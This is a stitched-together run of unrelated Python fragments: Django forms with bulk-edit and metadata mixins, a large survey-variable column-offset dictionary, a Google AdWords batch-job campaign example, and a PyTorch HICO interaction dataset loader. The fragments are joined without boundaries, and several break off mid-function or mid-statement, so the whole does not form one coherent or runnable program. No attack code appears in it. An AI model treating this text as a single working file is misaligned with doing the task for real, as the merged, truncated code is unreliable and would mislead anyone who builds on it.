c = super().save(commit=False, *args, **kwargs)
c.object_ref = self._parent
if commit:
c.save()
return c
class BulkEditMixin:
"""Mixin class adds methods to inject bulk-edit checkboxes and filter out before saves."""
@classmethod
def initial_from_model(cls, instance, prefix=None):
""" Builds a dict of initial form values from a Line model """
initial = {}
for fieldname in cls._meta.fields:
widget = cls._meta.widgets.get(fieldname, None)
value = getattr(instance, fieldname)
fieldkey = f"{prefix}-{fieldname}" if prefix else fieldname
# need to split MultiWidget values into each widget value
if isinstance(widget, forms.widgets.MultiWidget):
for i, part in enumerate(widget.decompress(value)):
initial[f"{fieldkey}_{i}"] = part
# JSONField gives back a dict; must serialize to json
elif isinstance(value, dict):
initial[fieldkey] = json.dumps(value)
# everything else shove value into fieldname
else:
initial[fieldkey] = str(value)
return initial
def check_bulk_edit(self):
exclude = []
# Look for "bulk-edit" checkboxes for each field
for field in self.visible_fields():
check = self.add_prefix(f"_bulk_{field.name}")
if check not in self.data:
exclude.append(field.name)
# remove fields without a check from self, preventing processing
for fieldname in exclude:
# Removing excluded key from fields
del self.fields[fieldname]
def inject_bulk_checkboxes(self):
# alter all fields to include a "bulk-edit" checkbox in label
# initially hidden via "off" class
for fieldname, field in self.fields.items():
bulkname = self.add_prefix(f"_bulk_{fieldname}")
field.label = mark_safe(
f'<input type="checkbox" class="bulk" name="{bulkname}" '
f'checked="checked" value=""/>{field.label}'
)
class MetadataEditMixin:
"""Mixin class adds methods to handle processing values for MetadataType."""
def clean_metadata(self):
# go through and delete any keys with None values
meta = self.cleaned_data.get("metadata", None)
if meta is None:
meta = {}
updating, removing = self.process_metadata_inputs(meta)
if self.is_editing():
replacement = dict(self.instance.metadata)
replacement.update(updating)
# we don't care about list of removed values, so no assignment below
collections.deque(
map(lambda key: replacement.pop(key, None), removing), maxlen=0
)
return replacement
# when not editing, just clean to the updating values
return updating
def is_editing(self):
"""Returns True when the Form is editing an instance object."""
return self.instance and self.instance.pk is not None
def process_metadata_inputs(self, meta):
"""
Given input from the metadata form field, return a dict of updated keys/values
and a set of keys to remove.
:returns: a 2-tuple of a dict of updated metadata values and a set of
removing metadata values.
"""
updating = {}
removing = set()
for key, value in meta.items():
# default processing:
# - treat None/null/undefined as empty string
# - remove values with a "delete" key in a dict
# - pass everything else verbatim
if value is None:
updating[key] = ""
elif isinstance(value, dict) and "delete" in value:
removing.add(key)
else:
updating[key] = value
return updating, removing
class LineForm(BulkEditMixin, MetadataEditMixin, forms.ModelForm):
""" Form to create/edit a line. """
class Meta:
model = Line
fields = (
"name",
"description",
"control",
"contact",
"experimenter",
"strains",
"metadata",
)
labels = {
"name": _("Line Name"),
"description": _("Description"),
"control": _("Is Control?"),
"contact": _("Contact"),
"experimenter": _("Experimenter"),
"strains": _("Strains"),
}
widgets = {
"name": forms.TextInput(
attrs={"class": "form-control", "placeholder": "(required)"}
),
"description": forms.Textarea(attrs={"rows": 2, "class": "form-control "}),
"control": forms.widgets.CheckboxInput(attrs={"class": "form-control"}),
"contact": UserAutocompleteWidget(),
"experimenter": UserAutocompleteWidget(),
"strains": MultiRegistryAutocompleteWidget(),
"metadata": HiddenJSONWidget(),
}
help_texts = {
"name": _(""),
"description": _(""),
"control": _(""),
"contact": _(""),
"experimenter": _(""),
"strains": _(""),
}
def __init__(self, *args, **kwargs):
# removes default hard-coded suffix of colon character on all labels
kwargs.setdefault("label_suffix", "")
# store the parent Study
self._study = kwargs.pop("study", None)
super().__init__(*args, **kwargs)
# alter all fields to include a "bulk-edit" checkbox in label
self.inject_bulk_checkboxes()
# make sure strain is keyed by registry_id instead of pk, and validates uuid
self._tweak_strains_field()
def _tweak_strains_field(self):
# make sure strain is keyed by registry_id instead of pk, and validates uuid
def __clean(self, value):
# validator creates Strain record if missing, now can check value
for v in value:
self.run_validators(v)
return self.__clean(value)
strains_field = self.fields["strains"]
strains_field.__clean = strains_field.clean
strains_field.clean = partial(__clean, strains_field)
strains_field.to_field_name = "registry_id"
strains_field.validators = [RegistryValidator().validate]
def clean(self):
super().clean()
# if no explicit experimenter is set, make the study contact the experimenter
if not self.cleaned_data.get("experimenter", None):
if self._study.contact:
self.cleaned_data["experimenter"] = self._study.contact
def save(self, commit=True, *args, **kwargs):
line = super().save(commit=False, *args, **kwargs)
line.study_id = self._study.pk
if commit:
line.save()
# since we forced commit=False in the first save, need to explicitly call save_m2m
self.save_m2m()
return line
class AssayForm(BulkEditMixin, MetadataEditMixin, forms.ModelForm):
""" Form to create/edit an assay. """
# allow auto-generation of name by override auto-created name field required kwarg
name = forms.CharField(
help_text=_(
"If left blank, a name in form [Line]-[Protocol]-[#] will be generated."
),
label=_("Name"),
max_length=255,
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}),
)
# order the options in the default SELECT widget; remove when using AutocompleteWidget
protocol = forms.ModelChoiceField(
label=_("Protocol"),
queryset=Protocol.objects.order_by("name"),
required=True,
# TODO add a ProtocolAutocompleteWidget instead of building a SELECT
widget=forms.Select(attrs={"class": "form-control"}),
)
class Meta:
model = Assay
fields = ("name", "description", "protocol", "experimenter", "metadata")
labels = {"description": _("Description"), "experimenter": _("Experimenter")}
help_texts = {"description": _(""), "experimenter": _("")}
widgets = {
"description": forms.Textarea(attrs={"rows": 2, "class": "form-control"}),
"experimenter": UserAutocompleteWidget(),
"metadata": HiddenJSONWidget(),
}
def __init__(self, *args, **kwargs):
# removes default hard-coded suffix of colon character on all labels
kwargs.setdefault("label_suffix", "")
# store the parent Lines
self._lines = kwargs.pop("lines", models.Line.objects.none())
# store the parent Study
self._study = kwargs.pop("study", None)
super().__init__(*args, **kwargs)
# alter all fields to include a "bulk-edit" checkbox in label
self.inject_bulk_checkboxes()
def save(self, commit=True, *args, **kwargs):
assay = super().save(commit=False, *args, **kwargs)
assay.study_id = self._study.pk
if commit:
if not self._lines.exists():
# when self._lines is empty, proceed normally for single ID
assay.save()
self.save_m2m()
else:
# when self._lines is set, Assay objects get created for each item
def link_to_line(line_id):
clone = deepcopy(assay)
clone.line_id = line_id
return clone
def save_linked(enum):
# caller passes linked iterator through enumerate, unpack the tuple
index = enum[0]
assay = enum[1]
assay.save()
if not assay.name:
# once saved, can update with | |
33891, 33892 ),
"DR15aYrCl_4" : ( 33892, 33893 ),
"DR16YrCl_4" : ( 33893, 33894 ),
"DR17YrCl_4" : ( 33894, 33895 ),
"DR5MnthCl_4" : ( 33895, 33896 ),
"DR6MnthCl_4" : ( 33896, 33897 ),
"DR7MnthCl_4" : ( 33897, 33898 ),
"DR7aMnthCl_4" : ( 33898, 33899 ),
"DR7bMnthCl_4" : ( 33899, 33900 ),
"DR8MnthCl_4" : ( 33900, 33901 ),
"DR9aMnthCl_4" : ( 33901, 33902 ),
"DR10MnthCl_4" : ( 33902, 33903 ),
"DR11bMnthCl_4" : ( 33903, 33904 ),
"DR11e2MnthCl_4" : ( 33904, 33905 ),
"DR12a2MnthCl_4" : ( 33905, 33906 ),
"DR12b1MnthCl_4" : ( 33906, 33907 ),
"DR12c1MnthCl_4" : ( 33907, 33908 ),
"DR13dMnthCl_4" : ( 33908, 33909 ),
"DR14bMnthCl_4" : ( 33909, 33910 ),
"DR18aMnthCl_4" : ( 33910, 33911 ),
"DR15aMnthCl_4" : ( 33911, 33912 ),
"DR16MnthCl_4" : ( 33912, 33913 ),
"DR17MnthCl_4" : ( 33913, 33914 ),
"DR19AgeOns_4" : ( 33914, 33916 ),
"DR19Ons_4" : ( 33916, 33917 ),
"DR19AgeRec_4" : ( 33917, 33919 ),
"DR19Rec_4" : ( 33919, 33920 ),
"DRSxCount4" : ( 33920, 33922 ),
"DRYrClCount4" : ( 33922, 33924 ),
"DRMnthClCount4" : ( 33924, 33926 ),
"DR19Qsx77" : ( 33926, 33927 ),
"DR19Qsx78" : ( 33927, 33928 ),
"DR19Qsx79" : ( 33928, 33929 ),
"DR19Qsx80" : ( 33929, 33930 ),
"DR19Qsx81" : ( 33930, 33931 ),
"DR19Qsx82" : ( 33931, 33932 ),
"DR19Qsx83" : ( 33932, 33933 ),
"DR19Qsx84" : ( 33933, 33934 ),
"DR19Qsx85" : ( 33934, 33935 ),
"DR19Qsx86" : ( 33935, 33936 ),
"DR19Qsx87" : ( 33936, 33937 ),
"DR19Qsx88" : ( 33937, 33938 ),
"DR19Qsx89" : ( 33938, 33939 ),
"DR19Qsx90" : ( 33939, 33940 ),
"DR19Qsx91" : ( 33940, 33941 ),
"DR19Qsx92" : ( 33941, 33942 ),
"DR19Qsx93" : ( 33942, 33943 ),
"DR19Qsx94" : ( 33943, 33944 ),
"DR19Qsx95" : ( 33944, 33945 ),
"DR19aQsx77" : ( 33945, 33946 ),
"DR19aQsx78" : ( 33946, 33947 ),
"DR19aQsx79" : ( 33947, 33948 ),
"DR19aQsx80" : ( 33948, 33949 ),
"DR19aQsx81" : ( 33949, 33950 ),
"DR19aQsx82" : ( 33950, 33951 ),
"DR19aQsx83" : ( 33951, 33952 ),
"DR19aQsx84" : ( 33952, 33953 ),
"DR19aQsx85" : ( 33953, 33954 ),
"DR19aQsx86" : ( 33954, 33955 ),
"DR19aQsx87" : ( 33955, 33956 ),
"DR19aQsx88" : ( 33956, 33957 ),
"DR19aQsx89" : ( 33957, 33958 ),
"DR19aQsx90" : ( 33958, 33959 ),
"DR19aQsx91" : ( 33959, 33960 ),
"DR19aQsx92" : ( 33960, 33961 ),
"DR19aQsx93" : ( 33961, 33962 ),
"DR19aQsx94" : ( 33962, 33963 ),
"DR19aQsx95" : ( 33963, 33964 ),
"DR19SxAgeOns_5" : ( 33964, 33966 ),
"DR19SxOns_5" : ( 33966, 33967 ),
"DR19SxAgeRec_5" : ( 33967, 33969 ),
"DR19SxRec_5" : ( 33969, 33970 ),
"DR5YrCl_5" : ( 33970, 33971 ),
"DR6YrCl_5" : ( 33971, 33972 ),
"DR7YrCl_5" : ( 33972, 33973 ),
"DR7aYrCl_5" : ( 33973, 33974 ),
"DR7bYrCl_5" : ( 33974, 33975 ),
"DR8YrCl_5" : ( 33975, 33976 ),
"DR9aYrCl_5" : ( 33976, 33977 ),
"DR10YrCl_5" : ( 33977, 33978 ),
"DR11bYrCl_5" : ( 33978, 33979 ),
"DR11e2YrCl_5" : ( 33979, 33980 ),
"DR12a2YrCl_5" : ( 33980, 33981 ),
"DR12b1YrCl_5" : ( 33981, 33982 ),
"DR12c1YrCl_5" : ( 33982, 33983 ),
"DR13dYrCl_5" : ( 33983, 33984 ),
"DR14bYrCl_5" : ( 33984, 33985 ),
"DR18aYrCl_5" : ( 33985, 33986 ),
"DR15aYrCl_5" : ( 33986, 33987 ),
"DR16YrCl_5" : ( 33987, 33988 ),
"DR17YrCl_5" : ( 33988, 33989 ),
"DR5MnthCl_5" : ( 33989, 33990 ),
"DR6MnthCl_5" : ( 33990, 33991 ),
"DR7MnthCl_5" : ( 33991, 33992 ),
"DR7aMnthCl_5" : ( 33992, 33993 ),
"DR7bMnthCl_5" : ( 33993, 33994 ),
"DR8MnthCl_5" : ( 33994, 33995 ),
"DR9aMnthCl_5" : ( 33995, 33996 ),
"DR10MnthCl_5" : ( 33996, 33997 ),
"DR11bMnthCl_5" : ( 33997, 33998 ),
"DR11e2MnthCl_5" : ( 33998, 33999 ),
"DR12a2MnthCl_5" : ( 33999, 34000 ),
"DR12b1MnthCl_5" : ( 34000, 34001 ),
"DR12c1MnthCl_5" : ( 34001, 34002 ),
"DR13dMnthCl_5" : ( 34002, 34003 ),
"DR14bMnthCl_5" : ( 34003, 34004 ),
"DR18aMnthCl_5" : ( 34004, 34005 ),
"DR15aMnthCl_5" : ( 34005, 34006 ),
"DR16MnthCl_5" : ( 34006, 34007 ),
"DR17MnthCl_5" : ( 34007, 34008 ),
"DR19AgeOns_5" : ( 34008, 34010 ),
"DR19Ons_5" : ( 34010, 34011 ),
"DR19AgeRec_5" : ( 34011, 34013 ),
"DR19Rec_5" : ( 34013, 34014 ),
"DRSxCount5" : ( 34014, 34016 ),
"DRYrClCount5" : ( 34016, 34018 ),
"DRMnthClCount5" : ( 34018, 34020 ),
"DR22FromMnth" : ( 34020, 34022 ),
"DR22FromYr" : ( 34022, 34026 ),
"DR22ToMnth" : ( 34026, 34028 ),
"DR22ToYR" : ( 34028, 34032 ),
"DR22FromMnth2" : ( 34032, 34034 ),
"DR22FromYr2" : ( 34034, 34038 ),
"DR22ToMnth2" : ( 34038, 34040 ),
"DR22ToYR2" : ( 34040, 34044 ),
"DR22FromMnth3" : ( 34044, 34046 ),
"DR22FromYr3" : ( 34046, 34050 ),
"DR22ToMnth3" : ( 34050, 34052 ),
"DR22ToYR3" : ( 34052, 34056 ),
"DR22FromMnth4" : ( 34056, 34058 ),
"DR22FromYr4" : ( 34058, 34062 ),
"DR22ToMnth4" : ( 34062, 34064 ),
"DR22ToYR4" : ( 34064, 34068 ),
"DR22FromMnth5" : ( 34068, 34070 ),
"DR22FromYr5" : ( 34070, 34074 ),
"DR22ToMnth5" : ( 34074, 34076 ),
"DR22ToYR5" : ( 34076, 34080 ),
"DR1a_10" : ( 34080, 34084 ),
"DR1a1_10" : ( 34084, 34085 ),
"DR1a2_10" : ( 34085, 34086 ),
"DR1bAgeOns_10" : ( 34086, 34088 ),
"DR1bOns_10" : ( 34088, 34089 ),
"DR1bAgeRec_10" : ( 34089, 34091 ),
"DR1bRec_10" : ( 34091, 34092 ),
"DR1c_10" : ( 34092, 34093 ),
"DR1a_11" : ( 34093, 34097 ),
"DR1a1_11" : ( 34097, 34098 ),
"DR1a2_11" : ( 34098, 34099 ),
"DR1bAgeOns_11" : ( 34099, 34101 ),
"DR1bOns_11" : ( 34101, 34102 ),
"DR1bAgeRec_11" : ( 34102, 34104 ),
"DR1bRec_11" : ( 34104, 34105 ),
"DR1c_11" : ( 34105, 34106 ),
"DR1a_12" : ( 34106, 34110 ),
"DR1a1_12" : ( 34110, 34111 ),
"DR1a2_12" : ( 34111, 34112 ),
"DR1bAgeOns_12" : ( 34112, 34114 ),
"DR1bOns_12" : ( 34114, 34115 ),
"DR1bAgeRec_12" : ( 34115, 34117 ),
"DR1bRec_12" : ( 34117, 34118 ),
"DR1c_12" : ( 34118, 34119 ),
"DR1a_13" : ( 34119, 34123 ),
"DR1a1_13" : ( 34123, 34124 ),
"DR1a2_13" : ( 34124, 34125 ),
"DR1bAgeOns_13" : ( 34125, 34127 ),
"DR1bOns_13" : ( 34127, 34128 ),
"DR1bAgeRec_13" : ( 34128, 34130 ),
"DR1bRec_13" : ( 34130, 34131 ),
"DR1c_13" : ( 34131, 34132 ),
"DR1a_14" : ( 34132, 34136 ),
"DR1a1_14" : ( 34136, 34137 ),
"DR1a2_14" : ( 34137, 34138 ),
"DR1bAgeOns_14" : ( 34138, 34140 ),
"DR1bOns_14" : ( 34140, 34141 ),
"DR1bAgeRec_14" : ( 34141, 34143 ),
"DR1bRec_14" : ( 34143, 34144 ),
"DR1c_14" : ( 34144, 34145 ),
"DR22_" : ( 34145, 34148 ),
"DR22A_" : ( 34148, 34150 ),
"DR22FromMnth6" : ( 34150, 34152 ),
"DR22FromYr6" : ( 34152, 34156 ),
"DR22ToMnth6" : ( 34156, 34158 ),
"DR22ToYR6" : ( 34158, 34162 ),
"DR22FromMnth7" : ( 34162, 34164 ),
"DR22FromYr7" : ( 34164, 34168 ),
"DR22ToMnth7" : ( 34168, 34170 ),
"DR22ToYR7" : ( 34170, 34174 ),
"DR22FromMnth8" : ( 34174, 34176 ),
"DR22FromYr8" : ( 34176, 34180 ),
"DR22ToMnth8" : ( 34180, 34182 ),
"DR22ToYR8" : ( 34182, 34186 ),
"DR22FromMnth9" : ( 34186, 34188 ),
"DR22FromYr9" : ( 34188, 34192 ),
"DR22ToMnth9" : ( 34192, 34194 ),
"DR22ToYR9" : ( 34194, 34198 ),
"DR22FromMnth10" : ( 34198, 34200 ),
"DR22FromYr10" : ( 34200, 34204 ),
"DR22ToMnth10" : ( 34204, 34206 ),
"DR22ToYR10" : ( 34206, 34210 ),
"DR1a_15" : ( 34210, 34214 ),
"DR1a1_15" : ( 34214, 34215 ),
"DR1a2_15" : ( 34215, 34216 ),
"DR1bAgeOns_15" : ( 34216, 34218 ),
"DR1bOns_15" : ( 34218, 34219 ),
"DR1bAgeRec_15" : ( 34219, 34221 ),
"DR1bRec_15" : ( 34221, 34222 ),
"DR1c_15" : ( 34222, 34223 ),
"DR1a_16" : ( 34223, 34227 ),
"DR1a1_16" : ( 34227, 34228 ),
"DR1a2_16" : ( 34228, 34229 ),
"DR1bAgeOns_16" : ( 34229, 34231 ),
"DR1bOns_16" : ( 34231, 34232 ),
"DR1bAgeRec_16" : ( 34232, 34234 ),
"DR1bRec_16" : ( 34234, 34235 | |
<gh_stars>1-10
#!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This uses the BatchJobService to create a complete Campaign.
The complete Campaign created by this example also includes AdGroups and
KeyWords.
"""
import random
import time
import urllib2
import uuid
from googleads import adwords
NUMBER_OF_CAMPAIGNS_TO_ADD = 2
NUMBER_OF_ADGROUPS_TO_ADD = 2
NUMBER_OF_KEYWORDS_TO_ADD = 5
MAX_POLL_ATTEMPTS = 5
PENDING_STATUSES = ('ACTIVE', 'AWAITING_FILE', 'CANCELING')
def main(client, number_of_campaigns, number_of_adgroups, number_of_keywords):
# Initialize BatchJobHelper.
batch_job_helper = client.GetBatchJobHelper(version='v201601')
# Create a BatchJob.
batch_job = AddBatchJob(client)
# Retrieve the URL used to upload the BatchJob operations.
upload_url = batch_job['uploadUrl']['url']
batch_job_id = batch_job['id']
print 'Created BatchJob with ID "%d", status "%s", and upload URL "%s"' % (
batch_job['id'], batch_job['status'], upload_url)
# Generate operations to upload.
budget_operations = BuildBudgetOperations(batch_job_helper)
campaign_operations = BuildCampaignOperations(
batch_job_helper, budget_operations, number_of_campaigns)
campaign_criterion_operations = BuildCampaignCriterionOperations(
campaign_operations)
adgroup_operations = BuildAdGroupOperations(
batch_job_helper, campaign_operations, number_of_adgroups)
adgroup_criterion_operations = BuildAdGroupCriterionOperations(
adgroup_operations, number_of_keywords)
adgroup_ad_operations = BuildAdGroupAdOperations(adgroup_operations)
# Upload operations.
batch_job_helper.UploadOperations(
upload_url, budget_operations, campaign_operations,
campaign_criterion_operations, adgroup_operations,
adgroup_criterion_operations, adgroup_ad_operations)
# Download and display results.
download_url = GetBatchJobDownloadUrlWhenReady(client, batch_job_id)
response = urllib2.urlopen(download_url).read()
PrintResponse(batch_job_helper, response)
def AddBatchJob(client):
"""Add a new BatchJob to upload operations to.
Args:
client: an instantiated AdWordsClient used to retrieve the BatchJob.
Returns:
The new BatchJob created by the request.
"""
# Initialize appropriate service.
batch_job_service = client.GetService('BatchJobService', version='v201601')
# Create a BatchJob.
batch_job_operations = [{
'operand': {},
'operator': 'ADD'
}]
return batch_job_service.mutate(batch_job_operations)['value'][0]
def BuildAdGroupAdOperations(adgroup_operations):
"""Builds the operations adding a TextAd to each AdGroup.
Args:
adgroup_operations: a list containing the operations that will add AdGroups.
Returns:
a list containing the operations that will create a new TextAd for each of
the provided AdGroups.
"""
adgroup_ad_operations = [
{
# The xsi_type of the operation can usually be guessed by the API
# because a given service only handles one type of operation.
# However, batch jobs process operations of different types, so
# the xsi_type must always be explicitly defined for these
# operations.
'xsi_type': 'AdGroupAdOperation',
'operand': {
'adGroupId': adgroup_operation['operand']['id'],
'ad': {
'xsi_type': 'TextAd',
'headline': 'Luxury Cruise to Mars',
'description1': 'Visit the Red Planet in style.',
'description2': 'Low-gravity fun for everyone!',
'displayUrl': 'www.example.com',
'finalUrls': ['http://www.example.com/1']
}
},
'operator': 'ADD'
}
for adgroup_operation in adgroup_operations]
return adgroup_ad_operations
def BuildAdGroupCriterionOperations(adgroup_operations, number_of_keywords=1):
"""Builds the operations adding a Keyword Criterion to each AdGroup.
Args:
adgroup_operations: a list containing the operations that will add AdGroups.
number_of_keywords: an int defining the number of Keywords to be created.
Returns:
a list containing the operations that will create a new Keyword Criterion
associated with each provided AdGroup.
"""
criterion_operations = [
{
# The xsi_type of the operation can usually be guessed by the API
# because a given service only handles one type of operation.
# However, batch jobs process operations of different types, so
# the xsi_type must always be explicitly defined for these
# operations.
'xsi_type': 'AdGroupCriterionOperation',
'operand': {
'xsi_type': 'BiddableAdGroupCriterion',
'adGroupId': adgroup_operation['operand']['id'],
'criterion': {
'xsi_type': 'Keyword',
# Make 50% of keywords invalid to demonstrate error handling.
'text': 'mars%s%s' % (i, '!!!' if i % 2 == 0 else ''),
'matchType': 'BROAD'
}
},
'operator': 'ADD'
}
for adgroup_operation in adgroup_operations
for i in range(number_of_keywords)]
return criterion_operations
def BuildAdGroupOperations(batch_job_helper,
campaign_operations, number_of_adgroups=1):
"""Builds the operations adding desired number of AdGroups to given Campaigns.
Note: When the AdGroups are created, they will have a different Id than those
generated here as a temporary Id. This is just used to identify them in the
BatchJobService.
Args:
batch_job_helper: a BatchJobHelper instance.
campaign_operations: a list containing the operations that will add
Campaigns.
number_of_adgroups: an int defining the number of AdGroups to be created per
Campaign.
Returns:
a list containing the operations that will add the desired number of
AdGroups to each of the provided Campaigns.
"""
adgroup_operations = [
{
# The xsi_type of the operation can usually be guessed by the API
# because a given service only handles one type of operation.
# However, batch jobs process operations of different types, so
# the xsi_type must always be explicitly defined for these
# operations.
'xsi_type': 'AdGroupOperation',
'operand': {
'campaignId': campaign_operation['operand']['id'],
'id': batch_job_helper.GetId(),
'name': 'Batch Ad Group #%s' % uuid.uuid4(),
'biddingStrategyConfiguration': {
'bids': [
{
'xsi_type': 'CpcBid',
'bid': {
'microAmount': 10000000
}
}
]
}
},
'operator': 'ADD'
}
for campaign_operation in campaign_operations
for _ in range(number_of_adgroups)]
return adgroup_operations
def BuildBudgetOperations(batch_job_helper):
"""Builds the operations needed to create a new Budget.
Note: When the Budget is created, it will have a different Id than the one
generated here as a temporary Id. This is just used to identify it in the
BatchJobService.
Args:
batch_job_helper: a BatchJobHelper instance.
Returns:
a list containing the operation that will create a new Budget.
"""
# A list of operations creating a Budget.
budget_operations = [{
# The xsi_type of the operation can usually be guessed by the API because
# a given service only handles one type of operation. However, batch jobs
# process operations of different types, so the xsi_type must always be
# explicitly defined for these operations.
'xsi_type': 'BudgetOperation',
'operand': {
'name': 'Batch budget #%s' % uuid.uuid4(),
# This is a temporary Id used by the BatchJobService to identify the
# Budget for operations that require a budgetId.
'budgetId': batch_job_helper.GetId(),
'amount': {
'microAmount': '50000000'
},
'deliveryMethod': 'STANDARD',
'period': 'DAILY'
},
'operator': 'ADD'
}]
return budget_operations
def BuildCampaignCriterionOperations(campaign_operations):
"""Builds the operations needed to create Negative Campaign Criterion.
Args:
campaign_operations: a list containing the operations that will add
Campaigns.
Returns:
a list containing the operations that will create a new Negative Campaign
Criterion associated with each provided Campaign.
"""
criterion_operations = [
{
# The xsi_type of the operation can usually be guessed by the API
# because a given service only handles one type of operation.
# However, batch jobs process operations of different types, so
# the xsi_type must always be explicitly defined for these
# operations.
'xsi_type': 'CampaignCriterionOperation',
'operand': {
'xsi_type': 'NegativeCampaignCriterion',
'campaignId': campaign_operation['operand']['id'],
'criterion': {
'xsi_type': 'Keyword',
'matchType': 'BROAD',
'text': 'venus'
}
},
'operator': 'ADD'
}
for campaign_operation in campaign_operations]
return criterion_operations
def BuildCampaignOperations(batch_job_helper,
budget_operations, number_of_campaigns=1):
"""Builds the operations needed to create a new Campaign.
Note: When the Campaigns are created, they will have a different Id than those
generated here as a temporary Id. This is just used to identify them in the
BatchJobService.
Args:
batch_job_helper: a BatchJobHelper instance.
budget_operations: a list containing the operation that will add the budget
used by these Campaigns.
number_of_campaigns: an int number defining the number of campaigns to be
created.
Returns:
a list containing the operations to create the desired number of Campaigns.
"""
# Grab the temporary budgetId to associate with the new Campaigns.
budget_id = budget_operations[0]['operand']['budgetId']
campaign_operations = [
{
# The xsi_type of the operation can usually be guessed by the API
# because a given service only handles one type of operation.
# However, batch jobs process operations of different types, so
# the xsi_type must always be explicitly defined for these
# operations.
'xsi_type': 'CampaignOperation',
'operand': {
'name': 'Batch Campaign #%s' % uuid.uuid4(),
'status': 'PAUSED',
# This is a temporary Id used by the BatchJobService to identify
# the Campaigns for operations that require a campaignId.
'id': batch_job_helper.GetId(),
'advertisingChannelType': 'SEARCH',
# Note that only the budgetId is required
'budget': {
'budgetId': budget_id
},
'biddingStrategyConfiguration': {
'biddingStrategyType': 'MANUAL_CPC'
}
},
'operator': 'ADD'
}
for _ in range(number_of_campaigns)]
return campaign_operations
def GetBatchJob(client, batch_job_id):
"""Retrieves the BatchJob with the given id.
Args:
client: an instantiated AdWordsClient used to retrieve the BatchJob.
batch_job_id: a long identifying the BatchJob to be retrieved.
| |
<gh_stars>10-100
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import os
import pickle
import random
import numpy as np
from PIL import Image
from random import randint
import torch
from maskrcnn_benchmark.structures.bounding_box import BoxList
from maskrcnn_benchmark.config import cfg
class HICODatasetObject(torch.utils.data.Dataset):
def __init__(
self, ann_file, root, train_val_neg_file, word_embedding_file, negative_sample_ratio, split, transforms=None
):
self.img_dir = root
self.annotations = pickle.load(open(ann_file, "rb"), encoding='latin1')
self.word_embeddings = pickle.load(open(word_embedding_file, "rb"), encoding='latin1')
self.negative_sample_ratio = negative_sample_ratio
self.tran_val_neg_file = pickle.load(open(train_val_neg_file, "rb"), encoding='latin1')
self.num_classes = 117
self.split = split
self._transforms = transforms
def __getitem__(self, idx):
anno = self.annotations[idx]
image_id = anno[0]['image_id']
img_path = os.path.join(self.img_dir, "HICO_train2015_%08d.jpg" % image_id)
img = Image.open(img_path)
img = img.convert('RGB')
# when using Image.open to read images, img.size= (640, 480), while using cv2.imread, im.shape = (480, 640)
# to be consistent with previous code, I used img.height, img.width here
im_shape = (img.height, img.width) # (480, 640)
blobs = self.bbox_augmentation(anno, image_id, im_shape)
# create a BoxList from the boxes
human_boxlist = BoxList(blobs['human_boxes'], img.size, mode="xyxy") # image_size=(width, height)
object_boxlist = BoxList(blobs['object_boxes'], img.size, mode="xyxy") # image_size=(width, height)
if self._transforms is not None:
img, human_boxlist, object_boxlist = self._transforms(img, human_boxlist, object_boxlist)
spatials = []
for human_box, object_box in zip(human_boxlist.bbox, object_boxlist.bbox):
ho_spatial = self.generate_spatial(human_box.numpy(), object_box.numpy()).reshape(1, 2, 64, 64)
spatials.append(ho_spatial)
blobs['spatials_object_centric'] = torch.FloatTensor(spatials).reshape(-1, 2, 64, 64)
blobs['human_boxes'], blobs['object_boxes'] = (human_boxlist,), (object_boxlist,)
return img, blobs, image_id
def get_img_info(self, index):
img_id = self.annotations[index][0]['image_id']
img_path = os.path.join(self.img_dir, "HICO_train2015_%08d.jpg" % img_id)
img = Image.open(img_path)
# width, height = img.size
height, width = img.height, img.width
return {
"height": height,
"width": width,
"idx": index,
"img_path": img_path,
"ann": self.annotations[index],
}
def __len__(self):
return len(self.annotations)
def bbox_augmentation(self, anno, image_id, im_shape):
# initialization
human_boxes = []
object_boxes = []
human_labels = []
object_labels = []
ho_pair_labels = []
object_word_embeddings = []
# spatials = []
mask = []
# ground truth box augmentation
for human_object_pair in anno:
human_box_aug = self.augment_box_one(human_object_pair['human_box'], im_shape)
human_boxes.append(human_box_aug)
object_box_aug = self.augment_box_one(human_object_pair['object_box'], im_shape)
object_boxes.append(object_box_aug)
human_verbs_to_vector = self.verb_list_to_vector(human_object_pair['human_action_id_list'])
human_labels.append(human_verbs_to_vector)
object_verbs_to_vector = self.verb_list_to_vector(human_object_pair['object_action_id_list'])
object_labels.append(object_verbs_to_vector)
ho_verbs_to_vector = self.verb_list_to_vector(human_object_pair['verb_id_list'])
ho_pair_labels.append(ho_verbs_to_vector)
object_class = human_object_pair['object_class']
object_word_embeddings.append(self.word_embeddings[object_class].reshape(300))
#@Done made bbox to shape (1,4), not (1,5), so modified the code here
#@Done changed to (1, 2, 64, 64)
# ho_spatial = self.generate_spatial(human_box_aug, object_box_aug).reshape(1, 2, 64, 64)
# spatials.append(ho_spatial)
curr_mask = self.generate_mask(human_object_pair['possible_verb_with_object'])
mask.append(curr_mask)
num_pos = len(human_boxes)
if image_id in self.tran_val_neg_file.keys():
human_boxes_neg = []
object_boxes_neg = []
object_word_embeddings_neg = []
# spatials_neg = []
mask_neg = []
for negative_pair in self.tran_val_neg_file[image_id]:
if self.bbox_iou(negative_pair['object_box'], anno[0]['object_box']) > 0.6:
human_box_neg_aug = self.augment_box_one(negative_pair['human_box'], im_shape)
human_boxes_neg.append(human_box_neg_aug)
object_box_neg_aug = self.augment_box_one(negative_pair['object_box'], im_shape)
object_boxes_neg.append(object_box_neg_aug)
object_class = negative_pair['object_class']
object_word_embeddings_neg.append(self.word_embeddings[object_class].reshape(300))
# @Done made bbox to shape (1,4) not (1,5), so modified the code here
# ho_spatial = self.generate_spatial(human_box_neg_aug[0, 1:], object_box_neg_aug[0, 1:]).reshape(1, 64, 64, 2)
# ho_spatial = self.generate_spatial(human_box_neg_aug, object_box_neg_aug).reshape(1, 2, 64, 64)
# spatials_neg.append(ho_spatial)
curr_mask = self.generate_mask(negative_pair['possible_verb_with_object'])
mask_neg.append(curr_mask)
# use all Neg example
if self.negative_sample_ratio != -1:
# subsample negative examples if we have too many
if len(human_boxes_neg) >= self.negative_sample_ratio * num_pos:
